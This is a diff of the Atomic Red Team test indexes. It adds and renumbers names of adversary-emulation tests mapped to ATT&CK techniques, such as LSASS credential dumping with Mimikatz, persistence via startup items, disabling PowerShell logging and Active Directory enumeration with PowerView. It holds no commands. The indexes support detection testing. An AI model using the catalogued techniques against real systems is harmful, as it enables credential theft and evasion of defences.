@@ -558,8 +601,13 @@ discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a
 discovery,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
 discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt
 discovery,T1201,Password Policy Discovery,6,Examine domain password policy - Windows,46c2c362-2679-4ef5-aec9-0e958e135be4,command_prompt
+discovery,T1201,Password Policy Discovery,8,Get-DomainPolicy with PowerView,3177f4da-3d4b-4592-8bdc-aa23d0b2e843,powershell
+discovery,T1201,Password Policy Discovery,9,Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy,b2698b33-984c-4a1c-93bb-e4ba72a0babb,powershell
 discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
 discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
+discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
+discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell
+discovery,T1057,Process Discovery,5,Process Discovery - wmic process,640cbf6d-659b-498b-ba53-f6dd1a1cc02c,command_prompt
 discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
 discovery,T1018,Remote System Discovery,1,Remote System Discovery - net,85321a9c-897f-4a60-9f20-29788e50bccd,command_prompt
 discovery,T1018,Remote System Discovery,2,Remote System Discovery - net group Domain Computers,f1bf6c8f-9016-4edf-aff9-80b65f5d711f,command_prompt
@@ -571,6 +619,10 @@ discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,9
 discovery,T1018,Remote System Discovery,10,Adfind - Enumerate Active Directory Computer Objects,a889f5be-2d54-4050-bd05-884578748bb4,command_prompt
 discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory Domain Controller Objects,5838c31e-a0e2-4b9f-b60a-d79d2cb7995e,command_prompt
 discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
+discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with Get-AdComputer,97e89d9e-e3f5-41b5-a90f-1e0825df0fdf,powershell
+discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
+discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
+discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
 discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
 discovery,T1518.001,Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
@@ -686,6 +738,7 @@ execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a6
 execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
 execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
 execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt
+execution,T1059.003,Windows Command Shell,4,Simulate BlackByte Ransomware Print Bombing,6b2903ac-8f36-450d-9ad5-b220e8a2dcb9,powershell
 execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
 execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
 execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -8,6 +8,7 @@
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1558.004 AS-REP Roasting](../../T1558.004/T1558.004.md)
   - Atomic Test #1: Rubeus asreproast [windows]
+  - Atomic Test #2: Get-DomainUser with PowerView [windows]
 - [T1552.003 Bash History](../../T1552.003/T1552.003.md)
   - Atomic Test #1: Search Through Bash History [linux, macos]
 - T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -82,19 +83,18 @@
 - [T1003.004 LSA Secrets](../../T1003.004/T1003.004.md)
   - Atomic Test #1: Dumping LSA Secrets [windows]
 - [T1003.001 LSASS Memory](../../T1003.001/T1003.001.md)
-  - Atomic Test #1: Windows Credential Editor [windows]
-  - Atomic Test #2: Dump LSASS.exe Memory using ProcDump [windows]
-  - Atomic Test #3: Dump LSASS.exe Memory using comsvcs.dll [windows]
-  - Atomic Test #4: Dump LSASS.exe Memory using direct system calls and API unhooking [windows]
-  - Atomic Test #5: Dump LSASS.exe Memory using NanoDump [windows]
-  - Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows]
-  - Atomic Test #7: Offline Credential Theft With Mimikatz [windows]
-  - Atomic Test #8: LSASS read with pypykatz [windows]
-  - Atomic Test #9: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
-  - Atomic Test #10: Create Mini Dump of LSASS.exe using ProcDump [windows]
-  - Atomic Test #11: Powershell Mimikatz [windows]
-  - Atomic Test #12: Dump LSASS with .Net 5 createdump.exe [windows]
-  - Atomic Test #13: Dump LSASS.exe using imported Microsoft DLLs [windows]
+  - Atomic Test #1: Dump LSASS.exe Memory using ProcDump [windows]
+  - Atomic Test #2: Dump LSASS.exe Memory using comsvcs.dll [windows]
+  - Atomic Test #3: Dump LSASS.exe Memory using direct system calls and API unhooking [windows]
+  - Atomic Test #4: Dump LSASS.exe Memory using NanoDump [windows]
+  - Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows]
+  - Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
+  - Atomic Test #7: LSASS read with pypykatz [windows]
+  - Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
+  - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
+  - Atomic Test #10: Powershell Mimikatz [windows]
+  - Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
+  - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
 - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1003.003 NTDS](../../T1003.003/T1003.003.md)
@@ -146,6 +146,7 @@
 - [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
   - Atomic Test #1: Dump individual process memory with sh (Local) [linux]
   - Atomic Test #2: Dump individual process memory with Python (Local) [linux]
+  - Atomic Test #3: Capture Passwords with MimiPenguin [linux]
 - [T1606.002 SAML Tokens](../../T1606.002/T1606.002.md)
   - Atomic Test #1: Golden SAML [azure-ad]
 - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
@@ -269,7 +270,8 @@
   - Atomic Test #1: At.exe Scheduled task [windows]
 - [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
   - Atomic Test #1: Authentication Package [windows]
-- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
+  - Atomic Test #1: Add a driver [windows]
 - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md)
   - Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
@@ -403,6 +405,8 @@
   - Atomic Test #5: Suspicious jse file run from startup Folder [windows]
   - Atomic Test #6: Suspicious bat file run from startup Folder [windows]
   - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
+  - Atomic Test #8: Add persistance via Recycle bin [windows]
+  - Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows]
 - T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
   - Atomic Test #1: Scheduled Task Startup Script [windows]
@@ -574,6 +578,7 @@
   - Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows]
 - [T1562.008 Disable Cloud Logs](../../T1562.008/T1562.008.md)
   - Atomic Test #1: AWS CloudTrail Changes [iaas:aws]
+  - Atomic Test #2: Azure - Eventhub Deletion [iaas:azure]
 - T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1562.002 Disable Windows Event Logging](../../T1562.002/T1562.002.md)
   - Atomic Test #1: Disable Windows IIS HTTP Logging [windows]
@@ -669,6 +674,7 @@
   - Atomic Test #5: Hidden files [macos]
   - Atomic Test #6: Hide a Directory [macos]
   - Atomic Test #7: Show all hidden files [macos]
+  - Atomic Test #8: Hide Files Through Registry [windows]
 - [T1564.002 Hidden Users](../../T1564.002/T1564.002.md)
   - Atomic Test #1: Create Hidden User using UniqueID < 500 [macos]
   - Atomic Test #2: Create Hidden User using IsHidden option [macos]
@@ -738,6 +744,7 @@
   - Atomic Test #2: Malware Masquerading and Execution from Zip File [windows]
 - [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
   - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
+  - Atomic Test #2: Masquerade as a built-in system executable [windows]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1112 Modify Registry](../../T1112/T1112.md)
@@ -748,6 +755,31 @@
   - Atomic Test #5: Javascript in registry [windows]
   - Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
   - Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows]
+  - Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows]
+  - Atomic Test #9: Disable Windows Registry Tool [windows]
+  - Atomic Test #10: Disable Windows CMD application [windows]
+  - Atomic Test #11: Disable Windows Task Manager application [windows]
+  - Atomic Test #12: Disable Windows Notification Center [windows]
+  - Atomic Test #13: Disable Windows Shutdown Button [windows]
+  - Atomic Test #14: Disable Windows LogOff Button [windows]
+  - Atomic Test #15: Disable Windows Change Password Feature [windows]
+  - Atomic Test #16: Disable Windows Lock Workstation Feature [windows]
+  - Atomic Test #17: Activate Windows NoDesktop Group Policy Feature [windows]
+  - Atomic Test #18: Activate Windows NoRun Group Policy Feature [windows]
+  - Atomic Test #19: Activate Windows NoFind Group Policy Feature [windows]
+  - Atomic Test #20: Activate Windows NoControlPanel Group Policy Feature [windows]
+  - Atomic Test #21: Activate Windows NoFileMenu Group Policy Feature [windows]
+  - Atomic Test #22: Activate Windows NoClose Group Policy Feature [windows]
+  - Atomic Test #23: Activate Windows NoSetTaskbar Group Policy Feature [windows]
+  - Atomic Test #24: Activate Windows NoTrayContextMenu Group Policy Feature [windows]
+  - Atomic Test #25: Activate Windows NoPropertiesMyDocuments Group Policy Feature [windows]
+  - Atomic Test #26: Hide Windows Clock Group Policy Feature [windows]
+  - Atomic Test #27: Windows HideSCAHealth Group Policy Feature [windows]
+  - Atomic Test #28: Windows HideSCANetwork Group Policy Feature [windows]
+  - Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows]
+  - Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows]
+  - Atomic Test #31: Windows Modify Show Compress Color And Info Tip Registry [windows]
+  - Atomic Test #32: Windows Powershell Logging Disabled [windows]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.005 Mshta](../../T1218.005/T1218.005.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
@@ -891,6 +923,7 @@
   - Atomic Test #7: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows]
   - Atomic Test #8: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows]
   - Atomic Test #9: DiskShadow Command Execution [windows]
+  - Atomic Test #10: Load Arbitrary DLL via Wuauclt (Windows Update Client) [windows]
 - [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
   - Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
   - Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
@@ -968,6 +1001,7 @@
   - Atomic Test #5: Azure - adding service principal to Azure AD role [azure-ad]
   - Atomic Test #6: Azure - adding user to Azure role in subscription [iaas:azure]
   - Atomic Test #7: Azure - adding service principal to Azure role in subscription [iaas:azure]
+  - Atomic Test #8: AzureAD - adding permission to application [azure-ad]
 - T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1137.006 Add-ins](../../T1137.006/T1137.006.md)
@@ -994,7 +1028,8 @@
   - Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
   - Atomic Test #3: Persist, Download, & Execute [windows]
   - Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
-- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
+  - Atomic Test #1: Add a driver [windows]
 - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1176 Browser Extensions](../../T1176/T1176.md)
@@ -1128,6 +1163,8 @@
   - Atomic Test #5: Suspicious jse file run from startup Folder [windows]
   - Atomic Test #6: Suspicious bat file run from startup Folder [windows]
   - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
+  - Atomic Test #8: Add persistance via Recycle bin [windows]
+  - Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows]
 - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
   - Atomic Test #1: Modify SSH Authorized Keys [macos, linux]
@@ -1223,6 +1260,7 @@
   - Atomic Test #6: Windows - Delete Backup Files [windows]
   - Atomic Test #7: Windows - wbadmin Delete systemstatebackup [windows]
   - Atomic Test #8: Windows - Disable the SR scheduled task [windows]
+  - Atomic Test #9: Disable System Restore Through Registry [windows]
 - [T1491.001 Internal Defacement](../../T1491.001/T1491.001.md)
   - Atomic Test #1: Replace Desktop Wallpaper [windows]
 - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1279,6 +1317,8 @@
   - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
   - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
   - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
+  - Atomic Test #11: Get-DomainUser with PowerView [windows]
+  - Atomic Test #12: Enumerate Active Directory Users with ADSISearcher [windows]
 - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
   - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
   - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -1288,6 +1328,11 @@
   - Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
   - Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
   - Atomic Test #8: Adfind - Query Active Directory Groups [windows]
+  - Atomic Test #9: Enumerate Active Directory Groups with Get-AdGroup [windows]
+  - Atomic Test #10: Enumerate Active Directory Groups with ADSISearcher [windows]
+  - Atomic Test #11: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
+  - Atomic Test #12: Get-DomainGroupMember with PowerView [windows]
+  - Atomic Test #13: Get-DomainGroup with PowerView [windows]
 - [T1482 Domain Trust Discovery](../../T1482/T1482.md)
   - Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
   - Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
@@ -1302,6 +1347,7 @@
   - Atomic Test #2: File and Directory Discovery (PowerShell) [windows]
   - Atomic Test #3: Nix File and Directory Discovery [macos, linux]
   - Atomic Test #4: Nix File and Directory Discovery 2 [macos, linux]
+  - Atomic Test #5: Simulating MAZE Directory Enumeration [windows]
 - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1087.001 Local Account](../../T1087.001/T1087.001.md)
   - Atomic Test #1: Enumerate all accounts (Local) [linux]
@@ -1347,12 +1393,17 @@
   - Atomic Test #5: Examine local password policy - Windows [windows]
   - Atomic Test #6: Examine domain password policy - Windows [windows]
   - Atomic Test #7: Examine password policy - macOS [macos]
+  - Atomic Test #8: Get-DomainPolicy with PowerView [windows]
+  - Atomic Test #9: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy [windows]
 - [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
   - Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
 - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1057 Process Discovery](../../T1057/T1057.md)
   - Atomic Test #1: Process Discovery - ps [macos, linux]
   - Atomic Test #2: Process Discovery - tasklist [windows]
+  - Atomic Test #3: Process Discovery - Get-Process [windows]
+  - Atomic Test #4: Process Discovery - get-wmiObject [windows]
+  - Atomic Test #5: Process Discovery - wmic process [windows]
 - [T1012 Query Registry](../../T1012/T1012.md)
   - Atomic Test #1: Query Registry [windows]
 - [T1018 Remote System Discovery](../../T1018/T1018.md)
@@ -1371,6 +1422,10 @@
   - Atomic Test #13: Remote System Discovery - ip route [linux]
   - Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux]
   - Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
+  - Atomic Test #16: Enumerate Active Directory Computers with Get-AdComputer [windows]
+  - Atomic Test #17: Enumerate Active Directory Computers with ADSISearcher [windows]
+  - Atomic Test #18: Get-DomainController with PowerView [windows]
+  - Atomic Test #19: Get-wmiobject to Enumerate Domain Controllers [windows]
 - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
   - Atomic Test #1: Security Software Discovery [windows]
   - Atomic Test #2: Security Software Discovery - powershell [windows]
@@ -1622,6 +1677,7 @@
   - Atomic Test #1: Create and Execute Batch Script [windows]
   - Atomic Test #2: Writes text to a file and displays it. [windows]
   - Atomic Test #3: Suspicious Execution via Windows Command Shell [windows]
+  - Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows]
 - [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
   - Atomic Test #1: WMI Reconnaissance Users [windows]
   - Atomic Test #2: WMI Reconnaissance Processes [windows]

atomics/Indexes/Indexes-Markdown/linux-index.md

@@ -54,6 +54,7 @@
 - [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
   - Atomic Test #1: Dump individual process memory with sh (Local) [linux]
   - Atomic Test #2: Dump individual process memory with Python (Local) [linux]
+  - Atomic Test #3: Capture Passwords with MimiPenguin [linux]
 - [T1606.002 SAML Tokens](../../T1606.002/T1606.002.md)
   - Atomic Test #1: Golden SAML [azure-ad]
 - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -215,6 +216,7 @@
 - T1610 Deploy Container [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1562.008 Disable Cloud Logs](../../T1562.008/T1562.008.md)
   - Atomic Test #1: AWS CloudTrail Changes [iaas:aws]
+  - Atomic Test #2: Azure - Eventhub Deletion [iaas:azure]
 - T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
@@ -462,6 +464,7 @@
   - Atomic Test #5: Azure - adding service principal to Azure AD role [azure-ad]
   - Atomic Test #6: Azure - adding user to Azure role in subscription [iaas:azure]
   - Atomic Test #7: Azure - adding service principal to Azure role in subscription [iaas:azure]
+  - Atomic Test #8: AzureAD - adding permission to application [azure-ad]
 - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1137.006 Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -3,6 +3,7 @@
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1558.004 AS-REP Roasting](../../T1558.004/T1558.004.md)
   - Atomic Test #1: Rubeus asreproast [windows]
+  - Atomic Test #2: Get-DomainUser with PowerView [windows]
 - T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
@@ -57,19 +58,18 @@
 - [T1003.004 LSA Secrets](../../T1003.004/T1003.004.md)
   - Atomic Test #1: Dumping LSA Secrets [windows]
 - [T1003.001 LSASS Memory](../../T1003.001/T1003.001.md)
-  - Atomic Test #1: Windows Credential Editor [windows]
-  - Atomic Test #2: Dump LSASS.exe Memory using ProcDump [windows]
-  - Atomic Test #3: Dump LSASS.exe Memory using comsvcs.dll [windows]
-  - Atomic Test #4: Dump LSASS.exe Memory using direct system calls and API unhooking [windows]
-  - Atomic Test #5: Dump LSASS.exe Memory using NanoDump [windows]
-  - Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows]
-  - Atomic Test #7: Offline Credential Theft With Mimikatz [windows]
-  - Atomic Test #8: LSASS read with pypykatz [windows]
-  - Atomic Test #9: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
-  - Atomic Test #10: Create Mini Dump of LSASS.exe using ProcDump [windows]
-  - Atomic Test #11: Powershell Mimikatz [windows]
-  - Atomic Test #12: Dump LSASS with .Net 5 createdump.exe [windows]
-  - Atomic Test #13: Dump LSASS.exe using imported Microsoft DLLs [windows]
+  - Atomic Test #1: Dump LSASS.exe Memory using ProcDump [windows]
+  - Atomic Test #2: Dump LSASS.exe Memory using comsvcs.dll [windows]
+  - Atomic Test #3: Dump LSASS.exe Memory using direct system calls and API unhooking [windows]
+  - Atomic Test #4: Dump LSASS.exe Memory using NanoDump [windows]
+  - Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows]
+  - Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
+  - Atomic Test #7: LSASS read with pypykatz [windows]
+  - Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
+  - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
+  - Atomic Test #10: Powershell Mimikatz [windows]
+  - Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows]
+  - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
 - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1003.003 NTDS](../../T1003.003/T1003.003.md)
@@ -197,7 +197,8 @@
   - Atomic Test #1: At.exe Scheduled task [windows]
 - [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
   - Atomic Test #1: Authentication Package [windows]
-- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
+  - Atomic Test #1: Add a driver [windows]
 - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md)
   - Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
@@ -291,6 +292,8 @@
   - Atomic Test #5: Suspicious jse file run from startup Folder [windows]
   - Atomic Test #6: Suspicious bat file run from startup Folder [windows]
   - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
+  - Atomic Test #8: Add persistance via Recycle bin [windows]
+  - Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows]
 - T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
   - Atomic Test #1: Scheduled Task Startup Script [windows]
@@ -461,6 +464,7 @@
 - [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md)
   - Atomic Test #3: Create Windows System File with Attrib [windows]
   - Atomic Test #4: Create Windows Hidden File with Attrib [windows]
+  - Atomic Test #8: Hide Files Through Registry [windows]
 - [T1564.003 Hidden Window](../../T1564.003/T1564.003.md)
   - Atomic Test #1: Hidden Window [windows]
 - [T1564 Hide Artifacts](../../T1564/T1564.md)
@@ -507,7 +511,8 @@
 - [T1036 Masquerading](../../T1036/T1036.md)
   - Atomic Test #1: System File Copied to Unusual Location [windows]
   - Atomic Test #2: Malware Masquerading and Execution from Zip File [windows]
-- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
+  - Atomic Test #2: Masquerade as a built-in system executable [windows]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1112 Modify Registry](../../T1112/T1112.md)
   - Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
@@ -517,6 +522,31 @@
   - Atomic Test #5: Javascript in registry [windows]
   - Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
   - Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows]
+  - Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows]
+  - Atomic Test #9: Disable Windows Registry Tool [windows]
+  - Atomic Test #10: Disable Windows CMD application [windows]
+  - Atomic Test #11: Disable Windows Task Manager application [windows]
+  - Atomic Test #12: Disable Windows Notification Center [windows]
+  - Atomic Test #13: Disable Windows Shutdown Button [windows]
+  - Atomic Test #14: Disable Windows LogOff Button [windows]
+  - Atomic Test #15: Disable Windows Change Password Feature [windows]
+  - Atomic Test #16: Disable Windows Lock Workstation Feature [windows]
+  - Atomic Test #17: Activate Windows NoDesktop Group Policy Feature [windows]
+  - Atomic Test #18: Activate Windows NoRun Group Policy Feature [windows]
+  - Atomic Test #19: Activate Windows NoFind Group Policy Feature [windows]
+  - Atomic Test #20: Activate Windows NoControlPanel Group Policy Feature [windows]
+  - Atomic Test #21: Activate Windows NoFileMenu Group Policy Feature [windows]
+  - Atomic Test #22: Activate Windows NoClose Group Policy Feature [windows]
+  - Atomic Test #23: Activate Windows NoSetTaskbar Group Policy Feature [windows]
+  - Atomic Test #24: Activate Windows NoTrayContextMenu Group Policy Feature [windows]
+  - Atomic Test #25: Activate Windows NoPropertiesMyDocuments Group Policy Feature [windows]
+  - Atomic Test #26: Hide Windows Clock Group Policy Feature [windows]
+  - Atomic Test #27: Windows HideSCAHealth Group Policy Feature [windows]
+  - Atomic Test #28: Windows HideSCANetwork Group Policy Feature [windows]
+  - Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows]
+  - Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows]
+  - Atomic Test #31: Windows Modify Show Compress Color And Info Tip Registry [windows]
+  - Atomic Test #32: Windows Powershell Logging Disabled [windows]
 - [T1218.005 Mshta](../../T1218.005/T1218.005.md)
